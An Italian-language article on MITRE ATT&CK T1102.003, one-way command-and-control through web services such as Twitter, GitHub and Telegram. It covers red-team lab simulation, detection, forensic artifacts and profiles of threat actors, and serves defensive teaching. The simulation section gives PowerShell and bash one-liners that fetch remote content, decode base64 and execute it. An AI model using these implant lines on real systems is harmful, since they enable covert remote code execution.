Comunicazione Unidirezionale via Web Service: One-Way Communication (T1102.003)

La simulazione di un canale C2 unidirezionale in laboratorio è un esercizio estremamente utile per validare la capacità del Blue Team di identificare connessioni sospette verso servizi legittimi. L'idea di fondo è semplice: pubblicare istruzioni codificate su una piattaforma pubblica e far sì che l'implant le recuperi periodicamente senza mai rispondere sullo stesso canale.

Canale Twitter/X come C2 di ispirazione HAMMERTOSS. Il malware HAMMERTOSS genera algoritmicamente un handle Twitter diverso ogni giorno, da cui scarica istruzioni. Per replicare questo schema si può creare un account di test su X e pubblicare comandi base64 come tweet. Lato implant, un semplice script PowerShell interroga l'API pubblica (o il feed RSS/Atom se disponibile) ed estrae il payload:

$page = Invoke-WebRequest -Uri "" -UseBasicParsing; $cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(($page.Content | Select-String -Pattern '[A-Za-z0-9+/=]{20,}').Matches[0].Value)); iex $cmd

Su Linux la stessa logica si implementa con curl e base64:

curl -s "" | grep -oP '[A-Za-z0-9+/=]{20,}' | head -1 | base64 -d | bash

Canale GitHub à la Leviathan. Il gruppo Leviathan ha usato profili GitHub e TechNet per ospitare istruzioni C2. In lab si crea un repository privato (o un Gist) contenente un file di testo con comandi cifrati. L'implant lo scarica con curl o Invoke-WebRequest a intervalli regolari, decodifica e esegue. L'assenza di qualsiasi upload verso GitHub costituisce il pattern unidirezionale.

Canale Telegram come Gamaredon. Il Gamaredon Group ha sfruttato contenuti su Telegram per risolvere indirizzi IP di C2. Si può replicare creando un canale Telegram pubblico con un bot, pubblicando IP o comandi, e leggendoli dall'implant tramite l'API Bot di Telegram con una semplice chiamata GET.

Per l'orchestrazione red team, strumenti come Sliver (open source) o Mythic (open source) supportano profili C2 personalizzabili che possono simulare polling verso servizi web legittimi. In particolare Mythic consente di sviluppare profili C2 custom in Python che replicano esattamente il comportamento di lettura da una sorgente esterna senza risposta.

Consiglio di loggare tutto il traffico generato durante la simulazione con Wireshark (open source) per fornire al Blue Team PCAP realistici su cui calibrare le detection.

Rilevare un canale C2 unidirezionale è una sfida autentica. Il traffico si confonde con la navigazione ordinaria e l'assenza di risposte anomale elimina uno degli indicatori classici. La strategia vincente combina analisi comportamentale, log correlation e una buona dose di tuning ambientale.

Log source prioritari. Su Windows, la combinazione di Sysmon (open source, richiede installazione) con il provider ETW Microsoft-Windows-WinINet fornisce visibilità sulle connessioni HTTP/S iniziate da processi non-browser. L'EventCode 3 di Sysmon cattura ogni connessione di rete con processo sorgente, porta e destinazione. Su Linux, auditd con regole sulle syscall connect e sendto — integrate con i log di iptables — copre scenari analoghi. Su macOS, lo Unified Log e Endpoint Security Framework registrano le connessioni URLSession. Per ambienti ESXi, i log hostd tracciano le connessioni in uscita dalla shell e dai task pianificati.

Il cuore della detection è il pattern di beaconing senza risposta. Un processo che contatta ripetutamente un dominio di servizio web (ad esempio sotto-domini di googleapis.com, github.com, api.telegram.org) a intervalli regolari — tipicamente tra 10 e 30 minuti — ma non riceve dati strutturati in risposta o non genera attività successiva correlata, è un candidato forte. RITA (open source, Active Countermeasures) è specificamente progettato per analizzare log Zeek (open source) e identificare pattern di beaconing tramite analisi statistica degli intervalli temporali e delle dimensioni dei pacchetti.

Per il tuning dei falsi positivi, tre dimensioni sono critiche:

• DestinationDomain: costruisci una whitelist dei servizi web legittimamente usati dall'organizzazione, poi monitora connessioni verso gli stessi domini da processi inattesi
• ProcessName: escludi tool di aggiornamento automatico, telemetria e agent di monitoraggio che generano pattern simili
• TimeWindow: regola la finestra di correlazione per distinguere beaconing malevolo da polling applicativo legittimo

La mitigazione M1021 (Restrict Web-Based Content) è il primo controllo preventivo: un web proxy con filtering per categoria e reputazione riduce drasticamente la superficie. Affiancalo con DNS filtering per bloccare risoluzioni verso domini associati a infrastrutture C2 note. La mitigazione M1031 (Network Intrusion Prevention) agisce a livello di signature: un IDS/IPS con firme aggiornate per i malware noti — come EVILNUM, HAMMERTOSS o Sagerunex — può intercettare pattern specifici nel traffico anche attraverso TLS, se si implementa SSL inspection.

L'analisi forense di un canale C2 unidirezionale richiede di ricostruire un flusso che, per design, lascia tracce minime. L'avversario ha scelto questa tecnica proprio per ridurre gli artefatti: non c'è exfiltration visibile, non ci sono risposte anomale, e il traffico sembra navigazione ordinaria. Eppure, gli artefatti esistono — bisogna sapere dove cercarli.

Artefatti Windows. Il punto di partenza è la cache del browser o del componente HTTP usato dal malware. Molte famiglie — HAMMERTOSS, Sagerunex, EVILNUM — utilizzano le API WinINet o WinHTTP, che popolano la cache di Internet Explorer/Edge Legacy. Il file WebCacheV01.dat (percorso *%LocalAppData%\Microsoft\Windows\WebCache*) contiene URL, timestamp e dimensioni delle risposte, analizzabile con ESEDatabaseView (gratuito) o con il modulo esedbexport di libesedb (open source). I log Sysmon, se abilitati, forniscono una correlazione processo-connessione tramite EventCode 3 che permette di legare l'eseguibile malevolo ai domini contattati.

Il Prefetch (*C:\Windows\Prefetch*) registra le prime otto esecuzioni di un binario e i file referenziati, permettendo di stabilire quando il malware è stato lanciato per la prima volta. PECmd di Eric Zimmerman (open source) è lo strumento standard per il parsing.

Artefatti Linux. I log di auditd con le syscall connect e execve registrano sia le connessioni in uscita sia i comandi eseguiti dal malware dopo aver ricevuto istruzioni. La bash history (~/.bash_history) e le crontab (crontab -l per utente, /var/spool/cron/) possono rivelare task di polling schedulati — uno schema coerente con il comportamento di Gamaredon Group che usava Telegram per risolvere IP C2.

Ricostruzione della timeline. L'approccio più efficace parte dai log DNS. Anche se il contenuto HTTPS è cifrato, le query DNS verso i domini dei servizi web usati come C2 (GitHub, Twitter, Telegram, GitLab, Digital Point) sono registrate dal resolver interno o dal DNS server aziendale. Correla i timestamp delle risoluzioni DNS con i EventCode 3 di Sysmon o i log auditd per costruire una sequenza temporale delle connessioni C2.

Per la campagna ArcaneDoor (C0046), che ha colpito dispositivi di rete Cisco con traffico HTTP C2 intercettato e parsato direttamente sul device, gli artefatti principali risiedono nei log del dispositivo stesso. La forensic su appliance di rete richiede l'estrazione del firmware e l'analisi delle configurazioni modificate, cercando i backdoor Line Runner e Line Dancer associati alla campagna.

Strumenti chiave per la timeline consolidata: log2timeline/Plaso (open source) per la super-timeline multi-sorgente, e Timesketch (open source) per la visualizzazione collaborativa.

Il panorama degli attori che adottano la comunicazione C2 unidirezionale via web service rivela un pattern trasversale: la tecnica non è appannaggio di un singolo cluster geopolitico, ma attraversa gruppi con obiettivi e capacità molto diversi, uniti dalla necessità di mimetizzare il traffico C2 nel rumore di fondo della rete.

Leviathan (G0065) è un gruppo associato ad attività di spionaggio con focus su settori navale, difesa e tecnologia. L'uso di profili GitHub e TechNet come sorgente di istruzioni C2 indica una preferenza per piattaforme con alta reputazione e bassa probabilità di blocco da parte dei proxy aziendali. Il pattern è coerente con operazioni a lungo termine dove la persistenza del canale C2 è prioritaria rispetto alla velocità di comunicazione.

Gamaredon Group (G0047) opera con un approccio più aggressivo e ad alto volume, storicamente orientato verso obiettivi ucraini. L'uso di Telegram come vettore per la discovery dell'IP C2 rappresenta un'evoluzione tattica interessante: invece di codificare indirizzi nel binario, il malware li recupera dinamicamente da un canale Telegram, rendendo l'infrastruttura C2 agile e rapidamente sostituibile.

La campagna ArcaneDoor (C0046), attribuita al cluster UAT4356/STORM-1849 e valutata come operazione state-sponsored, segna un'evoluzione significativa. Il targeting di dispositivi di rete Cisco e di altri vendor in reti governative e infrastrutture critiche, con traffico HTTP C2 intercettato e parsato direttamente sull'appliance compromessa, rappresenta una convergenza tra network device exploitation e C2 unidirezionale. I backdoor custom Line Runner e Line Dancer dimostrano un investimento in capability development specifico per questo vettore.

Sul fronte dei tool, il panorama è variegato. HAMMERTOSS rappresenta il caso studio più sofisticato: un algoritmo di domain generation applicato agli handle Twitter garantisce resilienza contro il takedown. EVILNUM diversifica usando GitLab e Digital Point. Sagerunex sceglie Twitter. OnionDuke lo usa come canale di backup. UPSTYLE adotta un approccio diverso, parsando comandi da log di errore generati tentando di risolvere pagine inesistenti — una variante creativa del pattern unidirezionale.

Il trend convergente è chiaro: la diversificazione delle piattaforme usate come dead drop resolver rende insufficiente il blocco di un singolo servizio. La raccomandazione per il TI team è di mantenere una mappatura aggiornata dei servizi web legittimi abusati come C2, monitorando in particolare l'emergere di nuove piattaforme nelle campagne attive.

Framework MITRE ATT&CK v16 — Tecnica T1102.003, Campagna C0046 (ArcaneDoor), Gruppi G0065, G0047, Software S0568, S1210, S0455, S0052, S1164, S0037, Mitigazioni M1021, M1031. Tool di detection: Sysmon, Zeek, RITA, auditd, Plaso/log2timeline, Timesketch. Integrato con conoscenza professionale per tool e procedure operative.